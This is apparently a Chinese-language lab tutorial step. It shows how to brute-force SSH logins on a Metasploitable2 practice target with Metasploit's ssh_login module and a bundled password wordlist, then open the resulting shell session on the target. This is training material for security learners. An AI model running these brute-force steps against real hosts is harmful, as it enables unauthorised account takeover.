暴力破解 SSH
在这一步中,你将学习如何在 Kali Linux 环境中使用 Metasploit Framework (MSF) 对 Metasploitable2 目标机上的 SSH 服务进行暴力破解攻击。
- 在 Kali Linux 容器中,启动 Metasploit 控制台:
cd ~
msfconsole
- 在 Metasploit 控制台中,使用
auxiliary/scanner/ssh/ssh_login
模块进行 SSH 暴力破解攻击:
use auxiliary/scanner/ssh/ssh_login
- 配置攻击所需的选项:
set rhosts 192.168.122.102
- 设置密码字典文件(你可以使用提供的
/usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
文件):
set userpass_file /usr/share/metasploit-framework/data/wordlists/piata_ssh_userpass.txt
- 将详细输出设置为
false
以避免过多的输出信息:
set verbose false
- 查看已配置的选项:
show options
- 启动暴力破解攻击:
exploit
攻击将开始,尝试使用指定字典文件中的用户名和密码组合登录 SSH 服务。一旦找到成功的登录,相应的凭据将会显示。
注意: 暴力破解过程可能会花费较长时间。如果你希望,可以在显示第一个成功登录后按 Ctrl+C
中断该过程。
-
找到成功的登录后,攻击脚本会自动创建一个 SSH 会话。你可以使用 sessions -i <session_id>
命令切换到该会话,其中 <session_id>
是输出中显示的会话 ID。
-
在 SSH 会话中,你可以在目标机上执行各种命令。
按 Ctrl+D 退出 Metasploit 控制台,然后开始检查